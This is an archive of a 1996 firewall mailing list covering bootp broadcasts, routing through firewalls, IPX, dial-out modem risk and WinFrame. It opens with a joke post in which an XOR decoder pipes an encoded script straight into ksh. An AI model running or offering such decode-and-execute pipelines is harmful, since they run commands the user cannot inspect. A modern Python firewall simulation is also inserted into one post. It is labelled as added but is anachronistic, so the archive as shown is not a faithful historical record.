   what I am looking to do is execute code from a pipe in the csh. I want to be able to take an encrypted script, decrypt it to a pipe and have the csh interpret that stream without creating an intermediate file. I think that unix will create /tmp files for buffering the stream, but I don't care about that.

Well, SP passed it on to Garabisje Dawg, and HE sez:

// Begin x.c
#include <stdio.h>

/* XOR every byte of stdin with 11 and write it to stdout. XOR is its
   own inverse, so the same program both encodes and decodes. ch is an
   int (not a char) so that EOF (-1) can be told apart from a data byte. */
int main(void)
{
    int ch;
    while ((ch = getc(stdin)) != EOF)
        putc(ch ^ 11, stdout);
    return 0;
}
// End x.c

file called: y.enc
----------- cut here ------
B6)jf)J6)Ebhn)+nhcd+)B+/B+j+/J+L~rWeNb}beoWe)
----------- end y.enc -----

N.B.
There is no EOF in y.enc

How to do it on a UNIX box:

make x
cat y.enc | ./x | ksh -

Garabisje Dawg
---------------------------------------------------------------

When you run it, you will get the name of the mask behind the mask.

Regret no further requests for hacks can be honored as staff and financial resources have not been budgeted by the Church for this purpose and I don't want to get kicked off this list like I got kicked off the others.

Sick Puppy, the Cat_Eating_Dawg
the Church of the Dead Meow

From firewalls-owner Thu Feb 8 09:01:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA01378 for firewalls-outgoing; Thu, 8 Feb 1996 08:48:54 -0800 (PST)
Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA01371 for ; Thu, 8 Feb 1996 08:48:49 -0800 (PST)
Received: by mickey.ovid.com (AIX 3.2/UCB 5.64/4.03) id AA18651; Thu, 8 Feb 1996 09:47:12 -0700
Date: Thu, 8 Feb 1996 09:47:11 -0700 (MST)
From: Adam Prato
To: Damir Rajnovic
Cc: firewalls@GreatCircle.COM
Subject: Re: 0.0.0.0 address on LAN
In-Reply-To: <199602080918.KAA17830@hvar.mzt.hr>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 8 Feb 1996, Damir Rajnovic wrote:

> Date: Thu, 8 Feb 1996 10:18:27 +0100 (MET)
> From: Damir Rajnovic
> To: firewalls@GreatCircle.COM
> Subject: 0.0.0.0 address on LAN
>
> Hello,
>
> Someone asked who produces the 0.0.0.0 ip address; the answer is Win95 (and NT
> maybe - don't have it around so can't be sure). Here is an excerpt:
>
> Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast)
> OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6
> Hops: 0, XID: 0000AF37, trying since 1024 second(s)
>
> and that guy has Win95 on his machine.

this looks like a 'bootp' request. Many printers, X terminals, and other standalone remote devices use it.
Adam

From firewalls-owner Thu Feb 8 09:23:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02416 for firewalls-outgoing; Thu, 8 Feb 1996 09:11:49 -0800 (PST)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA02394 for ; Thu, 8 Feb 1996 09:11:43 -0800 (PST)
Received: from uucp4.UU.NET by relay5.UU.NET with SMTP id QQacbc21742; Thu, 8 Feb 1996 12:10:54 -0500 (EST)
Received: from vanguard.UUCP by uucp4.UU.NET with UUCP/RMAIL ; Thu, 8 Feb 1996 12:10:56 -0500
Received: by vanguard.hmp.com (UUPC/extended 1.12b); Thu, 08 Feb 1996 09:12:27 MST
Date: Thu, 08 Feb 1996 09:12:23 MST
From: "Scott Deshaies"
Message-ID: <311a20eb.vanguard@vanguard.hmp.com>
Organization: High Mountain Press, Inc.
Reply-To: "Scott Deshaies"
To: doug@fc.com
Cc: "Firewalls Mailing List"
Subject: Re: NT Firewalls/Web Servers
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 7 Feb 1996 15:48:11 -0500 (EST), long-morrow@CS.YALE.EDU wrote:

> Doug@fc.com wrote:
> >Does anyone know of any good NT Firewalls and Web Servers?
> There are a number of different good Web Servers for NT (Netscape's,
> Microsoft's, O'Reilly & Assoc. WebSite, etc.):

Process Software (http://www.process.com/) has Purveyor 1.2 for NT which is a nice package. It's greatly improved from the EMWAC https server that it has its roots in, and also supports http/ftp proxies. It even supports proxy-to-proxy connections, so your intranet server can tunnel across your firewall to your external server. You can then limit the size of the hole in your firewall.

--
>> Scott R. Deshaies <> High Mountain Press, Inc.
<<
>> MIS Manager <> 2530 Camino Entrada * Santa Fe, NM 87505 <<
>> sdeshaies@hmp.com <> Direct:505/474-5103 http://www.hmp.com <<

From firewalls-owner Thu Feb 8 09:38:59 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02998 for firewalls-outgoing; Thu, 8 Feb 1996 09:29:07 -0800 (PST)
Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02990 for ; Thu, 8 Feb 1996 09:28:59 -0800 (PST)
Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id LAA26030; Thu, 8 Feb 1996 11:32:52 -0600
Date: Thu, 8 Feb 1996 11:32:50 -0600 (CST)
From: "Joe Smith (Really!)"
To: Adam Prato
cc: Damir Rajnovic , firewalls@GreatCircle.COM
Subject: Re: 0.0.0.0 address on LAN
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Except Win95 only supports DHCP.

On Thu, 8 Feb 1996, Adam Prato wrote:

>
>
> On Thu, 8 Feb 1996, Damir Rajnovic wrote:
>
> > Date: Thu, 8 Feb 1996 10:18:27 +0100 (MET)
> > From: Damir Rajnovic
> > To: firewalls@GreatCircle.COM
> > Subject: 0.0.0.0 address on LAN
> >
> > Hello,
> >
> > Someone asked who produces the 0.0.0.0 ip address; the answer is Win95 (and NT
> > maybe - don't have it around so can't be sure). Here is an excerpt:
> >
> > Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast)
> > OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6
> > Hops: 0, XID: 0000AF37, trying since 1024 second(s)
> >
> > and that guy has Win95 on his machine.
>
> this looks like a 'bootp' request. Many printers, X terminals, and other
> standalone remote devices use it.
>
> Adam
>

From firewalls-owner Thu Feb 8 09:53:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02816 for firewalls-outgoing; Thu, 8 Feb 1996 09:25:03 -0800 (PST)
Received: from tigger.jvnc.net (tigger.jvnc.net [128.121.50.145]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02809 for ; Thu, 8 Feb 1996 09:24:56 -0800 (PST)
Received: from mikes.barstool.com (mahal.webex.net) by tigger.jvnc.net with SMTP id AA09117 (5.65c/IDA-1.4.4 for firewalls@GreatCircle.com); Thu, 8 Feb 1996 12:24:02 -0500
Message-Id: <199602081724.AA09117@tigger.jvnc.net>
Comments: Authenticated sender is
From: "Michael Langdon"
Organization: RPM Associates, Inc.
To: firewalls@GreatCircle.com
Date: Thu, 8 Feb 1996 12:23:48 -0500
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: routing table go through firewall ?
X-Mailer: Pegasus Mail for Windows (v2.23)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You should be able to pass routing broadcasts through the firewall. I will make an assumption that you are using cisco routers; if not, the same method should apply assuming your routers can support similar commands.

Set up your firewall to pass protocol 9, which is the protocol number for IGP (any internal gateway protocol). Don't worry about port numbers since it isn't applicable. Make your source and destination addresses appropriate, either peer-to-peer or any-to-any. Set cache timeouts for this rule to be low (10 seconds should be good) if you want routing transactions logged; otherwise, routing updates will be often enough not to time out the session cache on the firewall.

On the routers you can set up peering relationships that avoid the normal routing broadcast to 255.255.255.255 which firewalls usually don't like to deal with.
Also if you run different subnets on either side of your firewall you need to add secondary addresses to your routers of the subnets opposite them on the firewall. You need this otherwise the router may get an update but toss it as an invalid source.

Add static arp entries into your routers pointing the address of the router interface (your peer) on the other side of the firewall at the firewall's closest interface. This allows each router to forward routing updates to the firewall for forwarding.

...and behold...it works like a charm....your mileage may vary.

Mike

On 8 Feb 96 at 12:21, F.Wetzels@amc.uva.nl wrote:

> fpmw> I am testing our fw-1 and have got a question before
> fpmw> implementing our security.
> fpmw> I will use dual homed g/w with fw-1 and connect each end to the internet
> fpmw> and our internal network.
> fpmw>
> fpmw> Our net -- Router ----- F/W ---- Router -- Internet
> fpmw>              |
> fpmw>          BBS Server ...
> fpmw> The question is whether each router can exchange its routing table or not ?
> fpmw> If so, how is it possible ?
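As an added illustration of the rule Mike describes above (this is not his configuration and not FW-1 syntax; it is a toy Python model written for this archive, not code from the original post), the following simulates a peer-to-peer protocol-9 rule in front of a session cache. The peer addresses, the 90-second update interval and the two cache timeouts are constructed assumptions. What it shows is the point made in the post: with a short cache timeout every routing update starts a fresh, logged session, with a long timeout only the first update is logged, and a broadcast update to 255.255.255.255 does not match a peer-to-peer rule at all.

```python
"""Toy stateful packet filter modelling a 'pass IP protocol 9 between two
router peers' rule with a session cache. Constructed example; addresses,
intervals and timeouts are assumptions, not values from the post."""

from dataclasses import dataclass

IGP_PROTO = 9  # IP protocol number for IGP, as named in the post


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: int
    ts: float  # seconds since simulation start


@dataclass
class Rule:
    src: str  # "any" or one address
    dst: str
    proto: int

    def matches(self, pkt: Packet) -> bool:
        # Protocol 9 carries no transport header, so there is no port to check.
        return (pkt.proto == self.proto
                and self.src in ("any", pkt.src)
                and self.dst in ("any", pkt.dst))


class Firewall:
    """Accepts packets matching a rule and tracks (src, dst, proto) sessions
    in a cache; only the first packet of a session produces a log entry."""

    def __init__(self, rules, cache_timeout):
        self.rules = rules
        self.cache_timeout = cache_timeout
        self.cache = {}    # (src, dst, proto) -> timestamp of last packet
        self.log = []      # one entry per newly created session
        self.dropped = []  # packets no rule permitted

    def handle(self, pkt: Packet) -> bool:
        if not any(r.matches(pkt) for r in self.rules):
            self.dropped.append(pkt)
            return False
        key = (pkt.src, pkt.dst, pkt.proto)
        last = self.cache.get(key)
        # A gap longer than the timeout means the old session expired, so
        # this packet opens a new one and gets logged.
        if last is None or pkt.ts - last > self.cache_timeout:
            self.log.append(f"t={pkt.ts:.0f}s new session {key}")
        self.cache[key] = pkt.ts
        return True


def simulate(cache_timeout, update_interval=90.0, duration=600.0):
    """Feed periodic router-to-router updates plus one broadcast update
    through the filter; return (accepted, logged, dropped) counts."""
    peer_a, peer_b = "192.0.2.1", "192.0.2.2"  # constructed peer addresses
    fw = Firewall([Rule(peer_a, peer_b, IGP_PROTO),
                   Rule(peer_b, peer_a, IGP_PROTO)], cache_timeout)
    accepted = 0
    t = 0.0
    while t < duration:
        if fw.handle(Packet(peer_a, peer_b, IGP_PROTO, t)):
            accepted += 1
        t += update_interval
    # The classic broadcast update does not match the peer-to-peer rule.
    fw.handle(Packet(peer_a, "255.255.255.255", IGP_PROTO, t))
    return accepted, len(fw.log), len(fw.dropped)


if __name__ == "__main__":
    for timeout in (10.0, 3600.0):
        accepted, logged, dropped = simulate(timeout)
        print(f"cache timeout {timeout:>6.0f}s: accepted={accepted} "
              f"logged={logged} dropped={dropped}")
```

With the assumed 90-second update interval, a 10-second cache timeout logs every update as its own session (7 updates, 7 log entries over ten minutes), while a one-hour timeout logs only the first; the broadcast update is dropped in both runs because the rule is written peer-to-peer rather than any-to-any.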
>

From firewalls-owner Thu Feb 8 10:08:58 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA03976 for firewalls-outgoing; Thu, 8 Feb 1996 09:52:36 -0800 (PST)
Received: from laptev.imonics.com (laptev.imonics.com [205.139.208.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA03971 for ; Thu, 8 Feb 1996 09:52:31 -0800 (PST)
Received: from thyrsus.imonics.com (thyrsus [205.139.209.197]) by laptev.imonics.com (8.7.3/8.7.3) with SMTP id MAA15761; Thu, 8 Feb 1996 12:51:32 -0500 (EST)
From: Stephen Schaefer - Network Computing Solutions
Received: by thyrsus.imonics.com (5.x/SMI-SVR4) id AA01106; Thu, 8 Feb 1996 12:51:27 -0500
Date: Thu, 8 Feb 1996 12:51:27 -0500
Message-Id: <9602081751.AA01106@thyrsus.imonics.com>
To: firewalls@GreatCircle.COM
In-Reply-To: <9602081105.AA12965@spibm02> (message from Rolf Weber on Thu, 8 Feb 1996 12:05:46 +0100 (MEZ))
Subject: Re: Most Secure Unix?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>[Jon Spencer]
>> I think perhaps my point wasn't made clearly. The firewall can only be as
>> good as the OS on which it exists. If your firewall is an application
>> on top of an OS, I can break the firewall by breaking the OS.
>>
>[Rolf Weber]
>i never heard of any breakin possible because of a kernel bug.
>may be i'm wrong, may be it's possible, but i cannot imagine.

The context here seems to be ``break in using only the net'', and thus the following example may be deemed disallowable, but the last statement immediately brings to my mind the symbolic-link-to-suid-shell-script bug.
- Stephen

From firewalls-owner Thu Feb 8 10:20:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02221 for firewalls-outgoing; Thu, 8 Feb 1996 09:06:57 -0800 (PST)
Received: from pfg-bh.principal.com (pfg-bh.principal.com [204.167.169.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02216 for ; Thu, 8 Feb 1996 09:06:50 -0800 (PST)
Received: (from uucp@localhost) by pfg-bh.principal.com (8.6.12/8.6.11) id LAA01372 for ; Thu, 8 Feb 1996 11:08:13 -0600
Received: from mailhub1.principal.com(162.131.2.16) by pfg-bh.principal.com via smap (V1.3) id sma001370; Thu Feb 8 11:08:02 1996
Received: from pfgmvs1.principal.com by mailhub1.principal.com; Thu, 8 Feb 96 11:02:52 -0600
Received: from PFGMVS1 by PFGMVS1 (IBM MVS SMTP V3R1) with BSMTP id 0488; Thu, 08 Feb 96 11:05:00 CST
Date: Thu, 8 Beb 96 10:56:27 CST
To:
Cc: "*internet " <*INTERNE%EMC2TNN@PFGMVS1.principal.com>
From: "HEROLD.BECKY"
Subject: RE: Dial-out risks
Message-Id: <311a2cca5de3004@mailhub1.principal.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

OUCH! Judging by a couple of responses I received to the message I posted yesterday, and rereading my post, I obviously did NOT make the point of my message clear!

The point I was trying to make was that people need to be made aware of why they SHOULD use the firewall to access the Internet, and not just slap a modem on their networked PCs. Putting a modem on the networked PC is the "bad thing" I was referring to in the following. (I should have written "...explain to people why putting a modem on a PC is a bad thing...")

I've found employees are more willing to follow policies when we can provide an explanation of the risks involved instead of just saying "Don't do that because we said so!" And, reality is, many people will take it upon themselves to reconfigure their PC if they feel they have a business need... unless (perhaps) they understand the risks involved.
>An important key to the success of a firewall is ensuring employees use it!
>This can require quite the sales job. In order to get buy-in (hopefully
>going from top management down through the ranks) it is necessary (in our
>organization anyway) to explain to people why what they want to do is a bad
>thing for the corporate network. One of the bad things people will want to
>do is install modems on PCs that are attached to the WAN and use them for
>"dial-out only". It is a challenging task to convince them that doing this
>DOES create a risk, even if they are using a non-DID phone line. (Especially
>if the WAN has tens of thousands of nodes spread across a geographically huge
>area.)

Yes, I agree that dialing out is a necessity for most businesses, and that dial-out access needs to occur through a single point on the network, or some other secured system. I'm looking for details that I can share with employees explaining WHY they need to use the corporate solution (e.g., firewall) to accomplish their dial-out business needs. Since many of these folks are technical, it would help if I had some technical information to go along with the general reasons. I don't think giving them information on these risks is trying to control them with fear...it's just a way of explaining what can happen.

If any of you can provide more details on the risks I listed yesterday (for PCs with modems), or have even more risks to add, I'd appreciate receiving them!

Thanks,
Becky Herold, Sr. Systems Analyst, Information Protection
herold.becky@principal.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The opinions expressed here are strictly my own and do not necessarily represent those of my employer.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From firewalls-owner Thu Feb 8 10:23:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA03450 for firewalls-outgoing; Thu, 8 Feb 1996 09:39:52 -0800 (PST)
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA03445 for ; Thu, 8 Feb 1996 09:39:46 -0800 (PST)
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA03510; Thu, 8 Feb 96 11:41:46 CST
Received: by mnbp.network.com with Microsoft Mail id <311A34B1@mnbp.network.com>; Thu, 08 Feb 96 11:36:49 CST
From: Craig McLellan
To: firewalls
Subject: RE: ipx routing
Date: Thu, 08 Feb 96 11:36:00 CST
Message-Id: <311A34B1@mnbp.network.com>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You could look at Network Systems Borderguard or Security Router. Both platforms provide multi-protocol firewalling. IPX, IP and all bridged traffic as well. www.network.com

RGRDS.....clm

----------
From: firewalls-owner
To: firewalls@GreatCircle.COM; 'Lehrer, Neil'
Subject: RE: ipx routing
Date: February 7, 1996 18:42

----------
From: Lehrer, Neil[SMTP:nlehrer@usia.gov]
Sent: Wednesday, February 07, 1996 8:19 AM
To: firewalls@GreatCircle.COM
Subject: ipx routing

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Re IPX routing

paul.carrol@medaphis.com offered up:

>I am about to setup a firewall for our Internet link.
>
>I have recently learned that we are bringing in an X.25 line from Compuserve.
>The line runs into a Compuserve box that resides here that we do NOT control.
>
>From the Compuserve box, a line runs into one of our router interfaces.
>
>Obviously, I want to firewall this link as well...
>It passes IPX and TCP/IP, and needs to do both.
>
>The problem I have is with IPX. We have decided on Raptor Eagle as our firewall.
>It will run on a SUN Sparc 20, and it will NOT pass IPX.
>
>Any suggestions?

Well .. not sure whether this works or not, but I'd be interested in comments myself. Is IPX critical for you ?

I ask because we're running IP and IPX on our LAN here, and I'm being pushed to allow both across our firewalling mechanism. Our Netware guy said to me the other day that we needed IPX as some products actually require IPX in order to work. This sounds like snake oil to me - I'd have thought that the underlying protocol - whether IP or IPX should make no difference whatsoever. Any comments on this ? It's also been suggested to me that Novell/IP works by simply encapsulating IPX within an IP packet - this doesn't quite sound like full IP to me. Can anyone comment upon this ? If we can move everything to IP, then our problems potentially disappear here, and I needn't route IPX at all. Sound easy to me from there (ish!).

I wonder Paul, whether you could do something along these lines ? I wonder everyone whether you all think I'm pouring snake oil around the place too ? :)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

it is true that some netware products use ipx/spx directly. whether they would work properly, or at all, with netware/ip is something you would have to test (unfortunately).

------------------------------------------------------------------------------------------

Native IP has been available for NetWare servers for some time; the problem is that the NetWare Core Protocols haven't been supported from IP until recently.

Since most user applications are using workstation or server services (NCP), installing IP wouldn't help advance these services over non-IPX links. It simply supplied ftp, lpd and other such unix-like services. Some IPX to IP encapsulation is available but I haven't had much experience with it.

NetWare 4.1, however, ships with a module called NetWare/IP.
It allows a 4.1 server to act as an IP to IPX gateway, forward IPX RIP/SAP over IP and so forth. Additionally, NetWare IP provides IP workstation shells that use IP for NCP (about time!).

The easiest solution to force the IPX traffic through a firewall would be to provide an IPX to IP NetWare gateway on the unsecure side of the firewall. It would be configured to forward RIP/SAP and translated IPX packets via the firewall to an IP to IPX NetWare gateway on the secure side of the firewall. Of course, the NetWare server on the unsecure side of the firewall is attackable.

The only other solution is to have the service provider create a gateway on their secure network and forward IPX packets and RIP/SAP.

From firewalls-owner Thu Feb 8 10:42:17 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA04946 for firewalls-outgoing; Thu, 8 Feb 1996 10:06:09 -0800 (PST)
Received: from gatekeeper.hcc.com (GATEKEEPER.HCC.COM [148.163.104.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA04941 for ; Thu, 8 Feb 1996 10:06:03 -0800 (PST)
Received: by gatekeeper.hcc.com (5.65/jj-092193); id AA15496; Thu, 8 Feb 1996 13:05:06 -0500
Received: by mailgate.bridgewater.ne.hcc.com (5.65/ejc-092393< Who Loves Class M Planets>); id AA17235; Thu, 8 Feb 1996 13:05:04 -0500
Received: from localhost (localhost [127.0.0.1]) by gumby.bridgewater.ne.hcc.com (8.6.10/8.6.10) with SMTP id JAA03098; Thu, 8 Feb 1996 09:24:57 -0500
From: "Edward J.M. Carley Jr."
Message-Id: <199602081424.JAA03098@gumby.bridgewater.ne.hcc.com>
X-Authentication-Warning: gumby.bridgewater.ne.hcc.com: Host localhost didn't use HELO protocol
To: security@crpht.lu (Bruno MAMER)
Cc: firewalls-digest@GreatCircle.COM, ejc@gumby.bridgewater.ne.hcc.com
Subject: Re: Firewall, yes, but policy first !
In-Reply-To: Your message of "Wed, 07 Feb 96 18:24:43 +0100."
Date: Thu, 08 Feb 96 09:24:51 -0500 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bruno I think the book you're looking for can be found at BASELINE Software Inc. in Sausalito, Calif. The author is Charles Cresson Wood, they're reachable at 800-829-9955 or http://www.baseline.com/people/infosec or info@baselinesoft.com. Hope this helps! cheers ejc //////////////////////////////////////////////////////////////////////// // Ed Carley // // ejc@hcc.com || ejc@gumby.bridgewater.ne.hcc.com // // Work (908)231-2525 Home (908)969-8688 // //////////////////////////////////////////////////////////////////////// From firewalls-owner Thu Feb 8 10:53:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA07928 for firewalls-outgoing; Thu, 8 Feb 1996 10:47:38 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA07922 for ; Thu, 8 Feb 1996 10:47:27 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id MAA13868 for greatcircle.com!firewalls; Thu, 8 Feb 1996 12:37:59 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA15841; 8 Feb 96 12:05:27 CST (Thu) Received: by sonic.nmti.com; id AA04496; Thu, 8 Feb 1996 11:36:11 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602081736.AA04496@sonic.nmti.com.nmti.com> Subject: Re: Strange protoc To: auampdrv@ibmmail.com (George Janczuk JZKGEQ - AMPLN1) Date: Thu, 8 Feb 1996 11:36:10 -0600 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <199602080704.XAA04381@miles.greatcircle.com> from "George Janczuk JZKGEQ - AMPLN1" at Feb 8, 96 01:52:38 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > We have some people interested in accessing CITRIX's WinFrame product over > the Internet. Do any people have any knowledge as to how WinFrame uses > TCP/IP? 
If it's like WinDD (which uses the same protocol) it uses a single TCP port for the whole connection, and doesn't encrypt... it's pretty much like opening general X traffic, with the same hijacking potential, except you get security through obscurity because the protocol is new and not well known. > Have people run it though their firewall? I accessed a remote WinDD box through our firewall when Tektronix was demoing it. From firewalls-owner Thu Feb 8 11:05:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA04490 for firewalls-outgoing; Thu, 8 Feb 1996 09:59:49 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA04477 for ; Thu, 8 Feb 1996 09:59:42 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA21816 for ; Thu, 8 Feb 1996 11:58:21 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA21812 for ; Thu, 8 Feb 1996 11:58:20 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id LAA08977; Thu, 8 Feb 1996 11:58:47 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA03555; Thu, 8 Feb 1996 11:58:48 -0600 Date: Thu, 8 Feb 1996 11:58:48 -0600 From: Rick Smith Message-Id: <199602081758.LAA03555@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >In message <9602021404.AA18008@mordred.sware.com> Charles Watt writes: >> Fine. You've got a nice system. Its use of TE-based MAC gives it some >> definite competitive advantages over those systems that do not use MAC, >> if integrated and administered properly. 
But TE provides no advantage >> over a similar system based on MAC, such as the Harris firewall. There >> you must compete based upon other features, such as better application >> support or ease of administration. And Karen Goertzel writes: >Or portability. Actually, Sidewinder's TE and Unix MLS systems should be fairly similar here, assuming the particular MLS implementation puts reasonable restrictions on root mode software. We drop shrink wrapped BSDI software into a separate domain on Sidewinder. It's immediately isolated from other components but still runs as if it's on a plain Unix system. One thing that was obvious from our LOCK R&D experience was that you had to have a strong but controlled notion of suid root if you wanted to be Unix compatible in a useful way. In any case the system must still enforce mandatory protections even if software is running suid root. Otherwise they aren't mandatory. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Feb 8 11:08:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA08133 for firewalls-outgoing; Thu, 8 Feb 1996 10:51:36 -0800 (PST) Received: from balder.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA08128 for ; Thu, 8 Feb 1996 10:51:31 -0800 (PST) Received: (from mail@localhost) by balder.ssds.com (8.6.9/8.6.9.SSDSnet-hub) id LAA21259; Thu, 8 Feb 1996 11:50:29 -0700 Received: from denver(134.127.16.1) by balder via smap (V1.3) id sma021256; Thu Feb 8 11:50:23 1996 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id LAA00946; Thu, 8 Feb 1996 11:50:21 -0700 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id NAA21664; Thu, 8 Feb 1996 13:50:19 -0500 Date: Thu, 8 Feb 1996 13:50:19 -0500 (EST) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: Mark Newton cc:
firewalls@GreatCircle.COM Subject: Re: The "ULTIMATELY secure firewall" web page In-Reply-To: <199602081110.VAA06734@cleese.apana.org.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think Marcus moved all this to V-One ? Mike ( ( | ( Mike Malik (mam@ssds.com) ) ) (| ), inc. 9841 Broken Land Parkway, Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 On Thu, 8 Feb 1996, Mark Newton wrote: > Date: Thu, 8 Feb 1996 21:40:07 +1030 (CST) > From: Mark Newton > To: firewalls@GreatCircle.COM > Subject: The "ULTIMATELY secure firewall" web page > > > I have a need to point out some network security problems to an > acquaintance, and thought it'd be effective if I illustrated some > of them by pointing him at "The ULTIMATELY secure firewall" page > on http://www.iwi.com/pubs/A1firewall.htm. > > Unfortunately, it seems to have disappeared :-( > > Can anyone offer me a pointer to the page? > > Thanks in advance, > > - mark > > -------------------------------------------------------------------- > I tried an internal modem, newton@cleese.apana.org.au > but it hurt when I walked.
Mark Newton > ----- Voice: +61-8-3732429 --------------- Data: +61-8-3736006 ----- > From firewalls-owner Thu Feb 8 11:24:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA09815 for firewalls-outgoing; Thu, 8 Feb 1996 11:17:57 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA09810 for ; Thu, 8 Feb 1996 11:17:52 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id LAA25339; Thu, 8 Feb 1996 11:14:17 -0800 Received: from ford.gbnet.org(192.188.96.10) by mycroft via smap (V1.3mjr) id sma025313; Thu Feb 8 11:13:35 1996 Received: (from steve@localhost) by ford.gbnet.org (8.7.1/8.6.12) id TAA23351; Thu, 8 Feb 1996 19:12:49 GMT From: Steve Kennedy Message-Id: <199602081912.TAA23351@ford.gbnet.org> Subject: Re: Global broadcasts To: firewalls@bifroest.demon.co.uk (Ian Miller) Date: Thu, 8 Feb 1996 19:12:48 +0000 (GMT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Ian Miller" at Feb 8, 96 00:01:33 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Ian Miller > I recently noticed an NFS client program doing a global UDP broadcast (i.e. > 